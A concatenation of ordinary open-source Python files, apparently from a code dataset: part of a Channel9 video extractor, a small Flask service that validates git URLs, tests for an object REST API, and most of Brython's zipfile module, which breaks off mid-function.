return None
return re.findall(r'<a href="/Niners/[^"]+">([^<]+)</a>', m.group(1))
def _extract_session_code(self, html):
m = re.search(r'<li class="code">\s*(?P<code>.+?)\s*</li>', html)
return m.group('code') if m is not None else None
def _extract_session_day(self, html):
m = re.search(r'<li class="day">\s*<a href="/Events/[^"]+">(?P<day>[^<]+)</a>\s*</li>', html)
return m.group('day').strip() if m is not None else None
def _extract_session_room(self, html):
m = re.search(r'<li class="room">\s*(?P<room>.+?)\s*</li>', html)
return m.group('room') if m is not None else None
def _extract_session_speakers(self, html):
return re.findall(r'<a href="/Events/Speakers/[^"]+">([^<]+)</a>', html)
def _extract_content(self, html, content_path):
# Look for downloadable content
formats = self._formats_from_html(html)
slides = self._extract_slides(html)
zip_ = self._extract_zip(html)
# Nothing to download
if len(formats) == 0 and slides is None and zip_ is None:
self._downloader.report_warning('None of recording, slides or zip are available for %s' % content_path)
return
# Extract meta
title = self._extract_title(html)
description = self._extract_description(html)
thumbnail = self._og_search_thumbnail(html)
duration = self._extract_duration(html)
avg_rating = self._extract_avg_rating(html)
rating_count = self._extract_rating_count(html)
view_count = self._extract_view_count(html)
comment_count = self._extract_comment_count(html)
common = {
'_type': 'video',
'id': content_path,
'description': description,
'thumbnail': thumbnail,
'duration': duration,
'avg_rating': avg_rating,
'rating_count': rating_count,
'view_count': view_count,
'comment_count': comment_count,
}
result = []
if slides is not None:
d = common.copy()
d.update({'title': title + '-Slides', 'url': slides})
result.append(d)
if zip_ is not None:
d = common.copy()
d.update({'title': title + '-Zip', 'url': zip_})
result.append(d)
if len(formats) > 0:
d = common.copy()
d.update({'title': title, 'formats': formats})
result.append(d)
return result
def _extract_entry_item(self, html, content_path):
contents = self._extract_content(html, content_path)
if contents is None:
return contents
if len(contents) > 1:
raise ExtractorError('Got more than one entry')
result = contents[0]
result['authors'] = self._extract_authors(html)
return result
def _extract_session(self, html, content_path):
contents = self._extract_content(html, content_path)
if contents is None:
return contents
session_meta = {
'session_code': self._extract_session_code(html),
'session_day': self._extract_session_day(html),
'session_room': self._extract_session_room(html),
'session_speakers': self._extract_session_speakers(html),
}
for content in contents:
content.update(session_meta)
return self.playlist_result(contents)
def _extract_list(self, content_path):
rss = self._download_xml(self._RSS_URL % content_path, content_path, 'Downloading RSS')
entries = [self.url_result(session_url.text, 'Channel9')
for session_url in rss.findall('./channel/item/link')]
title_text = rss.find('./channel/title').text
return self.playlist_result(entries, content_path, title_text)
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
content_path = mobj.group('contentpath')
webpage = self._download_webpage(url, content_path, 'Downloading web page')
page_type_m = re.search(r'<meta name="WT.entryid" content="(?P<pagetype>[^:]+)[^"]+"/>', webpage)
if page_type_m is not None:
page_type = page_type_m.group('pagetype')
if page_type == 'Entry': # Any 'item'-like page, may contain downloadable content
return self._extract_entry_item(webpage, content_path)
elif page_type == 'Session': # Event session page, may contain downloadable content
return self._extract_session(webpage, content_path)
elif page_type == 'Event':
return self._extract_list(content_path)
else:
raise ExtractorError('Unexpected WT.entryid %s' % page_type, expected=True)
else: # Assuming list
return self._extract_list(content_path)
|
Timothee/Passerelle | refs/heads/master | passerelle.py | 1 | import os
from urlparse import urlparse
from flask import Flask, request, Response
app = Flask(__name__)
@app.route("/", methods=["POST"])
def git2git():
from_url = request.args.get('from')
to_url = request.args.get('to')
if not from_url and not to_url:
return Response(status="400 Git URLs Not Sent With Request")
if not from_url:
return Response(status="400 Git 'from' URL Not Sent")
if not to_url:
return Response(status="400 Git 'to' URL Not Sent")
if not check_git_url(from_url):
return Response(status="400 Git 'from' URL Not Acceptable")
if not check_git_url(to_url):
return Response(status="400 Git 'to' URL Not Acceptable")
return Response(response="yay", status=200)
def check_git_url(url):
''' This is a gross sanity check on git URLs
It doesn't cover all cases but it should filter out
obviously wrong URLs
'''
accepted_schemes = ['ssh', 'git', 'http', 'https', 'ftp', 'ftps',
'rsync', 'file']
if not url.endswith(('.git', '.git/')):
return False
elif url.startswith('file:///'):
return True
elif '://' in url:
parsed = urlparse(url)
return parsed.scheme in accepted_schemes and parsed.netloc != ''
else:
return True
if __name__ == "__main__":
port = int(os.environ.get('PORT', 5000))
if port == 5000:
app.debug = True
app.run(host='0.0.0.0', port=port)
|
rudatalab/python-objectcube | refs/heads/master | api/test/test_object_resource/test_object_resource_by_id.py | 1 | import json
from api import app
from api.test import APITest
class TestAPIObjectResourceByID(APITest):
def __init__(self, *args, **kwargs):
super(TestAPIObjectResourceByID, self).__init__(*args, **kwargs)
self.base_url = '/api/objects'
self.app = app.test_client()
def _create_test_object(self):
data = {
'name': u'obj_name',
'digest': u'testdig'
}
res = self.post(self.base_url, data=data)
self.assertEqual(res.status_code, 201)
def test_get_object_by_id_with_invalid_id_returns_404(self):
res = self.get(self.base_url + '/1')
self.assertEqual(res.status_code, 404)
def test_get_object_by_id_returns_object_and_meta(self):
self._create_test_object()
fetch = self.get(self.base_url + '/1')
final = json.loads(fetch.data)
self.assertTrue(final.get(u'meta', False))
self.assertTrue(final.get(u'object', False))
def test_get_description_query_parameter_returns_description(self):
res = self.get(self.base_url + '/1?description')
data = json.loads(res.data)
self.assertTrue(data.get('endpoint') == 'api/objects/<int:id>')
def test_update_object_name_returns_updated_information(self):
self._create_test_object()
updated_data = {
'name': u'dummy'
}
edit = self.put(self.base_url + '/1', data=updated_data)
final = json.loads(edit.data)
self.assertEqual(edit.status_code, 200)
self.assertEqual(final.get('name'), u'dummy')
def test_put_with_no_data_returns_400(self):
res = self.put(self.base_url + '/1', data=None)
self.assertTrue(res.status_code == 400)
def test_update_object_by_id_without_required_params_returns_400(self):
self._create_test_object()
updated_data = {
'test': 'fail'
}
edit = self.put(self.base_url + '/1', data=updated_data)
self.assertEqual(edit.status_code, 400)
def test_updating_object_by_id_that_doesnt_exist_returns_404(self):
self._create_test_object()
updated_data = {
'name': u'dummy'
}
edit = self.put(self.base_url + '/500', data=updated_data)
self.assertEqual(edit.status_code, 404)
def test_delete_object_deletes_object_and_returns_204(self):
self._create_test_object()
res = self.delete(self.base_url + '/1')
self.assertTrue(res.status_code == 204)
res = self.get(self.base_url + '/1')
self.assertTrue(res.status_code == 404)
def test_delete_invalid_object_returns_404(self):
res = self.delete(self.base_url + '/1')
self.assertTrue(res.status_code == 404)
|
2014c2g4/2015cda0623 | refs/heads/master | static/Brython3.1.3-20150514-095342/Lib/zipfile.py | 620 | """
Read and write ZIP files.
XXX references to utf-8 need further investigation.
"""
import io
import os
import re
import imp
import sys
import time
import stat
import shutil
import struct
import binascii
try:
import zlib # We may need its compression method
crc32 = zlib.crc32
except ImportError:
zlib = None
crc32 = binascii.crc32
try:
import bz2 # We may need its compression method
except ImportError:
bz2 = None
try:
import lzma # We may need its compression method
except ImportError:
lzma = None
__all__ = ["BadZipFile", "BadZipfile", "error",
"ZIP_STORED", "ZIP_DEFLATED", "ZIP_BZIP2", "ZIP_LZMA",
"is_zipfile", "ZipInfo", "ZipFile", "PyZipFile", "LargeZipFile"]
class BadZipFile(Exception):
pass
class LargeZipFile(Exception):
"""
Raised when writing a zipfile, the zipfile requires ZIP64 extensions
and those extensions are disabled.
"""
error = BadZipfile = BadZipFile # Pre-3.2 compatibility names
ZIP64_LIMIT = (1 << 31) - 1
ZIP_FILECOUNT_LIMIT = 1 << 16
ZIP_MAX_COMMENT = (1 << 16) - 1
# constants for Zip file compression methods
ZIP_STORED = 0
ZIP_DEFLATED = 8
ZIP_BZIP2 = 12
ZIP_LZMA = 14
# Other ZIP compression methods not supported
DEFAULT_VERSION = 20
ZIP64_VERSION = 45
BZIP2_VERSION = 46
LZMA_VERSION = 63
# we recognize (but not necessarily support) all features up to that version
MAX_EXTRACT_VERSION = 63
# Below are some formats and associated data for reading/writing headers using
# the struct module. The names and structures of headers/records are those used
# in the PKWARE description of the ZIP file format:
# http://www.pkware.com/documents/casestudies/APPNOTE.TXT
# (URL valid as of January 2008)
# The "end of central directory" structure, magic number, size, and indices
# (section V.I in the format document)
structEndArchive = b"<4s4H2LH"
stringEndArchive = b"PK\005\006"
sizeEndCentDir = struct.calcsize(structEndArchive)
_ECD_SIGNATURE = 0
_ECD_DISK_NUMBER = 1
_ECD_DISK_START = 2
_ECD_ENTRIES_THIS_DISK = 3
_ECD_ENTRIES_TOTAL = 4
_ECD_SIZE = 5
_ECD_OFFSET = 6
_ECD_COMMENT_SIZE = 7
# These last two indices are not part of the structure as defined in the
# spec, but they are used internally by this module as a convenience
_ECD_COMMENT = 8
_ECD_LOCATION = 9
# The "central directory" structure, magic number, size, and indices
# of entries in the structure (section V.F in the format document)
structCentralDir = "<4s4B4HL2L5H2L"
stringCentralDir = b"PK\001\002"
sizeCentralDir = struct.calcsize(structCentralDir)
# indexes of entries in the central directory structure
_CD_SIGNATURE = 0
_CD_CREATE_VERSION = 1
_CD_CREATE_SYSTEM = 2
_CD_EXTRACT_VERSION = 3
_CD_EXTRACT_SYSTEM = 4
_CD_FLAG_BITS = 5
_CD_COMPRESS_TYPE = 6
_CD_TIME = 7
_CD_DATE = 8
_CD_CRC = 9
_CD_COMPRESSED_SIZE = 10
_CD_UNCOMPRESSED_SIZE = 11
_CD_FILENAME_LENGTH = 12
_CD_EXTRA_FIELD_LENGTH = 13
_CD_COMMENT_LENGTH = 14
_CD_DISK_NUMBER_START = 15
_CD_INTERNAL_FILE_ATTRIBUTES = 16
_CD_EXTERNAL_FILE_ATTRIBUTES = 17
_CD_LOCAL_HEADER_OFFSET = 18
# The "local file header" structure, magic number, size, and indices
# (section V.A in the format document)
structFileHeader = "<4s2B4HL2L2H"
stringFileHeader = b"PK\003\004"
sizeFileHeader = struct.calcsize(structFileHeader)
_FH_SIGNATURE = 0
_FH_EXTRACT_VERSION = 1
_FH_EXTRACT_SYSTEM = 2
_FH_GENERAL_PURPOSE_FLAG_BITS = 3
_FH_COMPRESSION_METHOD = 4
_FH_LAST_MOD_TIME = 5
_FH_LAST_MOD_DATE = 6
_FH_CRC = 7
_FH_COMPRESSED_SIZE = 8
_FH_UNCOMPRESSED_SIZE = 9
_FH_FILENAME_LENGTH = 10
_FH_EXTRA_FIELD_LENGTH = 11
# The "Zip64 end of central directory locator" structure, magic number, and size
structEndArchive64Locator = "<4sLQL"
stringEndArchive64Locator = b"PK\x06\x07"
sizeEndCentDir64Locator = struct.calcsize(structEndArchive64Locator)
# The "Zip64 end of central directory" record, magic number, size, and indices
# (section V.G in the format document)
structEndArchive64 = "<4sQ2H2L4Q"
stringEndArchive64 = b"PK\x06\x06"
sizeEndCentDir64 = struct.calcsize(structEndArchive64)
_CD64_SIGNATURE = 0
_CD64_DIRECTORY_RECSIZE = 1
_CD64_CREATE_VERSION = 2
_CD64_EXTRACT_VERSION = 3
_CD64_DISK_NUMBER = 4
_CD64_DISK_NUMBER_START = 5
_CD64_NUMBER_ENTRIES_THIS_DISK = 6
_CD64_NUMBER_ENTRIES_TOTAL = 7
_CD64_DIRECTORY_SIZE = 8
_CD64_OFFSET_START_CENTDIR = 9
def _check_zipfile(fp):
try:
if _EndRecData(fp):
return True # file has correct magic number
except IOError:
pass
return False
def is_zipfile(filename):
"""Quickly see if a file is a ZIP file by checking the magic number.
The filename argument may be a file or file-like object too.
"""
result = False
try:
if hasattr(filename, "read"):
result = _check_zipfile(fp=filename)
else:
with open(filename, "rb") as fp:
result = _check_zipfile(fp)
except IOError:
pass
return result
def _EndRecData64(fpin, offset, endrec):
"""
Read the ZIP64 end-of-archive records and use that to update endrec
"""
try:
fpin.seek(offset - sizeEndCentDir64Locator, 2)
except IOError:
# If the seek fails, the file is not large enough to contain a ZIP64
# end-of-archive record, so just return the end record we were given.
return endrec
data = fpin.read(sizeEndCentDir64Locator)
if len(data) != sizeEndCentDir64Locator:
return endrec
sig, diskno, reloff, disks = struct.unpack(structEndArchive64Locator, data)
if sig != stringEndArchive64Locator:
return endrec
if diskno != 0 or disks != 1:
raise BadZipFile("zipfiles that span multiple disks are not supported")
# Assume no 'zip64 extensible data'
fpin.seek(offset - sizeEndCentDir64Locator - sizeEndCentDir64, 2)
data = fpin.read(sizeEndCentDir64)
if len(data) != sizeEndCentDir64:
return endrec
sig, sz, create_version, read_version, disk_num, disk_dir, \
dircount, dircount2, dirsize, diroffset = \
struct.unpack(structEndArchive64, data)
if sig != stringEndArchive64:
return endrec
# Update the original endrec using data from the ZIP64 record
endrec[_ECD_SIGNATURE] = sig
endrec[_ECD_DISK_NUMBER] = disk_num
endrec[_ECD_DISK_START] = disk_dir
endrec[_ECD_ENTRIES_THIS_DISK] = dircount
endrec[_ECD_ENTRIES_TOTAL] = dircount2
endrec[_ECD_SIZE] = dirsize
endrec[_ECD_OFFSET] = diroffset
return endrec
def _EndRecData(fpin):
"""Return data from the "End of Central Directory" record, or None.
The data is a list of the nine items in the ZIP "End of central dir"
record followed by a tenth item, the file seek offset of this record."""
# Determine file size
fpin.seek(0, 2)
filesize = fpin.tell()
# Check to see if this is ZIP file with no archive comment (the
# "end of central directory" structure should be the last item in the
# file if this is the case).
try:
fpin.seek(-sizeEndCentDir, 2)
except IOError:
return None
data = fpin.read()
if (len(data) == sizeEndCentDir and
data[0:4] == stringEndArchive and
data[-2:] == b"\000\000"):
# the signature is correct and there's no comment, unpack structure
endrec = struct.unpack(structEndArchive, data)
endrec=list(endrec)
# Append a blank comment and record start offset
endrec.append(b"")
endrec.append(filesize - sizeEndCentDir)
# Try to read the "Zip64 end of central directory" structure
return _EndRecData64(fpin, -sizeEndCentDir, endrec)
# Either this is not a ZIP file, or it is a ZIP file with an archive
# comment. Search the end of the file for the "end of central directory"
# record signature. The comment is the last item in the ZIP file and may be
# up to 64K long. It is assumed that the "end of central directory" magic
# number does not appear in the comment.
maxCommentStart = max(filesize - (1 << 16) - sizeEndCentDir, 0)
fpin.seek(maxCommentStart, 0)
data = fpin.read()
start = data.rfind(stringEndArchive)
if start >= 0:
# found the magic number; attempt to unpack and interpret
recData = data[start:start+sizeEndCentDir]
if len(recData) != sizeEndCentDir:
# Zip file is corrupted.
return None
endrec = list(struct.unpack(structEndArchive, recData))
commentSize = endrec[_ECD_COMMENT_SIZE] #as claimed by the zip file
comment = data[start+sizeEndCentDir:start+sizeEndCentDir+commentSize]
endrec.append(comment)
endrec.append(maxCommentStart + start)
# Try to read the "Zip64 end of central directory" structure
return _EndRecData64(fpin, maxCommentStart + start - filesize,
endrec)
# Unable to find a valid end of central directory structure
return None
class ZipInfo (object):
"""Class with attributes describing each file in the ZIP archive."""
__slots__ = (
'orig_filename',
'filename',
'date_time',
'compress_type',
'comment',
'extra',
'create_system',
'create_version',
'extract_version',
'reserved',
'flag_bits',
'volume',
'internal_attr',
'external_attr',
'header_offset',
'CRC',
'compress_size',
'file_size',
'_raw_time',
)
def __init__(self, filename="NoName", date_time=(1980,1,1,0,0,0)):
self.orig_filename = filename # Original file name in archive
# Terminate the file name at the first null byte. Null bytes in file
# names are used as tricks by viruses in archives.
null_byte = filename.find(chr(0))
if null_byte >= 0:
filename = filename[0:null_byte]
# This is used to ensure paths in generated ZIP files always use
# forward slashes as the directory separator, as required by the
# ZIP format specification.
if os.sep != "/" and os.sep in filename:
filename = filename.replace(os.sep, "/")
self.filename = filename # Normalized file name
self.date_time = date_time # year, month, day, hour, min, sec
if date_time[0] < 1980:
raise ValueError('ZIP does not support timestamps before 1980')
# Standard values:
self.compress_type = ZIP_STORED # Type of compression for the file
self.comment = b"" # Comment for each file
self.extra = b"" # ZIP extra data
if sys.platform == 'win32':
self.create_system = 0 # System which created ZIP archive
else:
# Assume everything else is unix-y
self.create_system = 3 # System which created ZIP archive
self.create_version = DEFAULT_VERSION # Version which created ZIP archive
self.extract_version = DEFAULT_VERSION # Version needed to extract archive
self.reserved = 0 # Must be zero
self.flag_bits = 0 # ZIP flag bits
self.volume = 0 # Volume number of file header
self.internal_attr = 0 # Internal attributes
self.external_attr = 0 # External file attributes
# Other attributes are set by class ZipFile:
# header_offset Byte offset to the file header
# CRC CRC-32 of the uncompressed file
# compress_size Size of the compressed file
# file_size Size of the uncompressed file
def FileHeader(self, zip64=None):
"""Return the per-file header as a string."""
dt = self.date_time
dosdate = (dt[0] - 1980) << 9 | dt[1] << 5 | dt[2]
dostime = dt[3] << 11 | dt[4] << 5 | (dt[5] // 2)
if self.flag_bits & 0x08:
# Set these to zero because we write them after the file data
CRC = compress_size = file_size = 0
else:
CRC = self.CRC
compress_size = self.compress_size
file_size = self.file_size
extra = self.extra
min_version = 0
if zip64 is None:
zip64 = file_size > ZIP64_LIMIT or compress_size > ZIP64_LIMIT
if zip64:
fmt = '<HHQQ'
extra = extra + struct.pack(fmt,
1, struct.calcsize(fmt)-4, file_size, compress_size)
if file_size > ZIP64_LIMIT or compress_size > ZIP64_LIMIT:
if not zip64:
raise LargeZipFile("Filesize would require ZIP64 extensions")
# File is larger than what fits into a 4 byte integer,
# fall back to the ZIP64 extension
file_size = 0xffffffff
compress_size = 0xffffffff
min_version = ZIP64_VERSION
if self.compress_type == ZIP_BZIP2:
min_version = max(BZIP2_VERSION, min_version)
elif self.compress_type == ZIP_LZMA:
min_version = max(LZMA_VERSION, min_version)
self.extract_version = max(min_version, self.extract_version)
self.create_version = max(min_version, self.create_version)
filename, flag_bits = self._encodeFilenameFlags()
header = struct.pack(structFileHeader, stringFileHeader,
self.extract_version, self.reserved, flag_bits,
self.compress_type, dostime, dosdate, CRC,
compress_size, file_size,
len(filename), len(extra))
return header + filename + extra
def _encodeFilenameFlags(self):
try:
return self.filename.encode('ascii'), self.flag_bits
except UnicodeEncodeError:
return self.filename.encode('utf-8'), self.flag_bits | 0x800
def _decodeExtra(self):
# Try to decode the extra field.
extra = self.extra
unpack = struct.unpack
while extra:
tp, ln = unpack('<HH', extra[:4])
if tp == 1:
if ln >= 24:
counts = unpack('<QQQ', extra[4:28])
elif ln == 16:
counts = unpack('<QQ', extra[4:20])
elif ln == 8:
counts = unpack('<Q', extra[4:12])
elif ln == 0:
counts = ()
else:
raise RuntimeError("Corrupt extra field %s"%(ln,))
idx = 0
# ZIP64 extension (large files and/or large archives)
if self.file_size in (0xffffffffffffffff, 0xffffffff):
self.file_size = counts[idx]
idx += 1
if self.compress_size == 0xFFFFFFFF:
self.compress_size = counts[idx]
idx += 1
if self.header_offset == 0xffffffff:
old = self.header_offset
self.header_offset = counts[idx]
idx+=1
extra = extra[ln+4:]
class _ZipDecrypter:
"""Class to handle decryption of files stored within a ZIP archive.
ZIP supports a password-based form of encryption. Even though known
plaintext attacks have been found against it, it is still useful
to be able to get data out of such a file.
Usage:
zd = _ZipDecrypter(mypwd)
plain_char = zd(cypher_char)
plain_text = map(zd, cypher_text)
"""
def _GenerateCRCTable():
"""Generate a CRC-32 table.
ZIP encryption uses the CRC32 one-byte primitive for scrambling some
internal keys. We noticed that a direct implementation is faster than
relying on binascii.crc32().
"""
poly = 0xedb88320
table = [0] * 256
for i in range(256):
crc = i
for j in range(8):
if crc & 1:
crc = ((crc >> 1) & 0x7FFFFFFF) ^ poly
else:
crc = ((crc >> 1) & 0x7FFFFFFF)
table[i] = crc
return table
crctable = _GenerateCRCTable()
def _crc32(self, ch, crc):
"""Compute the CRC32 primitive on one byte."""
return ((crc >> 8) & 0xffffff) ^ self.crctable[(crc ^ ch) & 0xff]
def __init__(self, pwd):
self.key0 = 305419896
self.key1 = 591751049
self.key2 = 878082192
for p in pwd:
self._UpdateKeys(p)
def _UpdateKeys(self, c):
self.key0 = self._crc32(c, self.key0)
self.key1 = (self.key1 + (self.key0 & 255)) & 4294967295
self.key1 = (self.key1 * 134775813 + 1) & 4294967295
self.key2 = self._crc32((self.key1 >> 24) & 255, self.key2)
def __call__(self, c):
"""Decrypt a single character."""
assert isinstance(c, int)
k = self.key2 | 2
c = c ^ (((k * (k^1)) >> 8) & 255)
self._UpdateKeys(c)
return c
class LZMACompressor:
def __init__(self):
self._comp = None
def _init(self):
props = lzma._encode_filter_properties({'id': lzma.FILTER_LZMA1})
self._comp = lzma.LZMACompressor(lzma.FORMAT_RAW, filters=[
lzma._decode_filter_properties(lzma.FILTER_LZMA1, props)
])
return struct.pack('<BBH', 9, 4, len(props)) + props
def compress(self, data):
if self._comp is None:
return self._init() + self._comp.compress(data)
return self._comp.compress(data)
def flush(self):
if self._comp is None:
return self._init() + self._comp.flush()
return self._comp.flush()
class LZMADecompressor:
def __init__(self):
self._decomp = None
self._unconsumed = b''
self.eof = False
def decompress(self, data):
if self._decomp is None:
self._unconsumed += data
if len(self._unconsumed) <= 4:
return b''
psize, = struct.unpack('<H', self._unconsumed[2:4])
if len(self._unconsumed) <= 4 + psize:
return b''
self._decomp = lzma.LZMADecompressor(lzma.FORMAT_RAW, filters=[
lzma._decode_filter_properties(lzma.FILTER_LZMA1,
self._unconsumed[4:4 + psize])
])
data = self._unconsumed[4 + psize:]
del self._unconsumed
result = self._decomp.decompress(data)
self.eof = self._decomp.eof
return result
compressor_names = {
0: 'store',
1: 'shrink',
2: 'reduce',
3: 'reduce',
4: 'reduce',
5: 'reduce',
6: 'implode',
7: 'tokenize',
8: 'deflate',
9: 'deflate64',
10: 'implode',
12: 'bzip2',
14: 'lzma',
18: 'terse',
19: 'lz77',
97: 'wavpack',
98: 'ppmd',
}
def _check_compression(compression):
if compression == ZIP_STORED:
pass
elif compression == ZIP_DEFLATED:
if not zlib:
raise RuntimeError(
"Compression requires the (missing) zlib module")
elif compression == ZIP_BZIP2:
if not bz2:
raise RuntimeError(
"Compression requires the (missing) bz2 module")
elif compression == ZIP_LZMA:
if not lzma:
raise RuntimeError(
"Compression requires the (missing) lzma module")
else:
raise RuntimeError("That compression method is not supported")
def _get_compressor(compress_type):
if compress_type == ZIP_DEFLATED:
return zlib.compressobj(zlib.Z_DEFAULT_COMPRESSION,
zlib.DEFLATED, -15)
elif compress_type == ZIP_BZIP2:
return bz2.BZ2Compressor()
elif compress_type == ZIP_LZMA:
return LZMACompressor()
else:
return None
def _get_decompressor(compress_type):
if compress_type == ZIP_STORED:
return None
elif compress_type == ZIP_DEFLATED:
return zlib.decompressobj(-15)
elif compress_type == ZIP_BZIP2:
return bz2.BZ2Decompressor()
elif compress_type == ZIP_LZMA:
return LZMADecompressor()
else:
descr = compressor_names.get(compress_type)
if descr:
raise NotImplementedError("compression type %d (%s)" % (compress_type, descr))
else:
raise NotImplementedError("compression type %d" % (compress_type,))
class ZipExtFile(io.BufferedIOBase):
"""File-like object for reading an archive member.
Is returned by ZipFile.open().
"""
# Max size supported by decompressor.
MAX_N = 1 << 31 - 1
# Read from compressed files in 4k blocks.
MIN_READ_SIZE = 4096
# Search for universal newlines or line chunks.
PATTERN = re.compile(br'^(?P<chunk>[^\r\n]+)|(?P<newline>\n|\r\n?)')
def __init__(self, fileobj, mode, zipinfo, decrypter=None,
close_fileobj=False):
self._fileobj = fileobj
self._decrypter = decrypter
self._close_fileobj = close_fileobj
self._compress_type = zipinfo.compress_type
self._compress_left = zipinfo.compress_size
self._left = zipinfo.file_size
self._decompressor = _get_decompressor(self._compress_type)
self._eof = False
self._readbuffer = b''
self._offset = 0
self._universal = 'U' in mode
self.newlines = None
# Adjust read size for encrypted files since the first 12 bytes
# are for the encryption/password information.
if self._decrypter is not None:
self._compress_left -= 12
self.mode = mode
self.name = zipinfo.filename
if hasattr(zipinfo, 'CRC'):
self._expected_crc = zipinfo.CRC
self._running_crc = crc32(b'') & 0xffffffff
else:
self._expected_crc = None
def readline(self, limit=-1):
"""Read and return a line from the stream.
If limit is specified, at most limit bytes will be read.
"""
if not self._universal and limit < 0:
# Shortcut common case - newline found in buffer.
i = self._readbuffer.find(b'\n', self._offset) + 1
if i > 0:
line = self._readbuffer[self._offset: i]
self._offset = i
return line
if not self._universal:
return io.BufferedIOBase.readline(self, limit)
line = b''
while limit < 0 or len(line) < limit:
readahead = self.peek(2)
if readahead == b'':
return line
#
# Search for universal newlines or line chunks.
#
# The pattern returns either a line chunk or a newline, but not
# both. Combined with peek(2), we are assured that the sequence
# '\r\n' is always retrieved completely and never split into
# separate newlines - '\r', '\n' due to coincidental readaheads.
#
match = self.PATTERN.search(readahead)
newline = match.group('newline')
if newline is not None:
if self.newlines is None:
self.newlines = []
if newline not in self.newlines:
self.newlines.append(newline)
self._offset += len(newline)
return line + b'\n'
chunk = match.group('chunk')
if limit >= 0:
chunk = chunk[: limit - len(line)]
self._offset += len(chunk)
line += chunk
return line
def peek(self, n=1):
"""Returns buffered bytes without advancing the position."""
if n > len(self._readbuffer) - self._offset:
chunk = self.read(n)
if len(chunk) > self._offset:
self._readbuffer = chunk + self._readbuffer[self._offset:]
self._offset = 0
else:
self._offset -= len(chunk)
# Return up to 512 bytes to reduce allocation overhead for tight loops.
return self._readbuffer[self._offset: self._offset + 512]
def readable(self):
return True
def read(self, n=-1):
"""Read and return up to n bytes.
If the argument is omitted, None, or negative, data is read and returned until EOF is reached..
"""
if n is None or n < 0:
buf = self._readbuffer[self._offset:]
self._readbuffer = b''
self._offset = 0
while not self._eof:
buf += self._read1(self.MAX_N)
return buf
end = n + self._offset
if end < len(self._readbuffer):
buf = self._readbuffer[self._offset:end]
self._offset = end
return buf
n = end - len(self._readbuffer)
buf = self._readbuffer[self._offset:]
self._readbuffer = b''
self._offset = 0
while n > 0 and not self._eof:
data = self._read1(n)
if n < len(data):
self._readbuffer = data
self._offset = n
buf += data[:n]
break
buf += data
n -= len(data)
return buf
def _update_crc(self, newdata):
# Update the CRC using the given data.
if self._expected_crc is None:
# No need to compute the CRC if we don't have a reference value
return
self._running_crc = crc32(newdata, self._running_crc) & 0xffffffff
# Check the CRC if we're at the end of the file
if self._eof and self._running_crc != self._expected_crc:
raise BadZipFile("Bad CRC-32 for file %r" % self.name)
def read1(self, n):
"""Read up to n bytes with at most one read() system call."""
if n is None or n < 0:
buf = self._readbuffer[self._offset:]
self._readbuffer = b''
self._offset = 0
while not self._eof:
data = self._read1(self.MAX_N)
if data:
buf += data
break
return buf
end = n + self._offset
if end < len(self._readbuffer):
buf = self._readbuffer[self._offset:end]
self._offset = end
return buf
n = end - len(self._readbuffer)
buf = self._readbuffer[self._offset:]
self._readbuffer = b''
self._offset = 0
if n > 0:
while not self._eof:
data = self._read1(n)
if n < len(data):
self._readbuffer = data
self._offset = n
buf += data[:n]
break
if data:
buf += data
break
return buf
def _read1(self, n):
# Read up to n compressed bytes with at most one read() system call,
# decrypt and decompress them.
if self._eof or n <= 0:
return b''
# Read from file.
if self._compress_type == ZIP_DEFLATED:
## Handle unconsumed data.
data = self._decompressor.unconsumed_tail
if n > len(data):
data += self._read2(n - len(data))
else:
data = self._read2(n)
if self._compress_type == ZIP_STORED:
self._eof = self._compress_left <= 0
elif self._compress_type == ZIP_DEFLATED:
n = max(n, self.MIN_READ_SIZE)
data = self._decompressor.decompress(data, n)
self._eof = (self._decompressor.eof or
self._compress_left <= 0 and
not self._decompressor.unconsumed_tail)
if self._eof:
data += self._decompressor.flush()
else:
data = self._decompressor.decompress(data)
self._eof = self._decompressor.eof or self._compress_left <= 0
data = data[:self._left]
self._left -= len(data)
if self._left <= 0:
self._eof = True
self._update_crc(data)
return data
def _read2(self, n):
if self._compress_left <= 0:
return b''
n = max(n, self.MIN_READ_SIZE)
n = min(n, self._compress_left)
data = self._fileobj.read(n)
self._compress_left -= len(data)
if self._decrypter is not None:
data = bytes(map(self._decrypter, data))
return data
def close(self):
try:
if self._close_fileobj:
self._fileobj.close()
finally:
super().close()
class ZipFile:
""" Class with methods to open, read, write, close, list zip files.
z = ZipFile(file, mode="r", compression=ZIP_STORED, allowZip64=False)
file: Either the path to the file, or a file-like object.
If it is a path, the file will be opened and closed by ZipFile.
mode: The mode can be either read "r", write "w" or append "a".
compression: ZIP_STORED (no compression), ZIP_DEFLATED (requires zlib),
ZIP_BZIP2 (requires bz2) or ZIP_LZMA (requires lzma).
allowZip64: if True ZipFile will create files with ZIP64 extensions when
needed, otherwise it will raise an exception when this would
be necessary.
"""
fp = None # Set here since __del__ checks it
_windows_illegal_name_trans_table = None
def __init__(self, file, mode="r", compression=ZIP_STORED, allowZip64=False):
"""Open the ZIP file with mode read "r", write "w" or append "a"."""
if mode not in ("r", "w", "a"):
raise RuntimeError('ZipFile() requires mode "r", "w", or "a"')
_check_compression(compression)
self._allowZip64 = allowZip64
self._didModify = False
self.debug = 0 # Level of printing: 0 through 3
self.NameToInfo = {} # Find file info given name
self.filelist = [] # List of ZipInfo instances for archive
self.compression = compression # Method of compression
self.mode = key = mode.replace('b', '')[0]
self.pwd = None
self._comment = b''
# Check if we were passed a file-like object
if isinstance(file, str):
# No, it's a filename
self._filePassed = 0
self.filename = file
modeDict = {'r' : 'rb', 'w': 'wb', 'a' : 'r+b'}
try:
self.fp = io.open(file, modeDict[mode])
except IOError:
if mode == 'a':
mode = key = 'w'
self.fp = io.open(file, modeDict[mode])
else:
raise
else:
self._filePassed = 1
self.fp = file
self.filename = getattr(file, 'name', None)
try:
if key == 'r':
self._RealGetContents()
elif key == 'w':
# set the modified flag so central directory gets written
# even if no files are added to the archive
self._didModify = True
elif key == 'a':
try:
# See if file is a zip file
self._RealGetContents()
# seek to start of directory and overwrite
self.fp.seek(self.start_dir, 0)
except BadZipFile:
# file is not a zip file, just append
self.fp.seek(0, 2)
# set the modified flag so central directory gets written
# even if no files are added to the archive
self._didModify = True
else:
raise RuntimeError('Mode must be "r", "w" or "a"')
except:
fp = self.fp
self.fp = None
if not self._filePassed:
fp.close()
raise
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def _RealGetContents(self):
"""Read in the table of contents for the ZIP file."""
fp = self.fp
try:
endrec = _EndRecData(fp)
except IOError:
raise BadZipFile("File is not a zip file")
if not endrec:
raise BadZipFile("File is not a zip file")
if self.debug > 1:
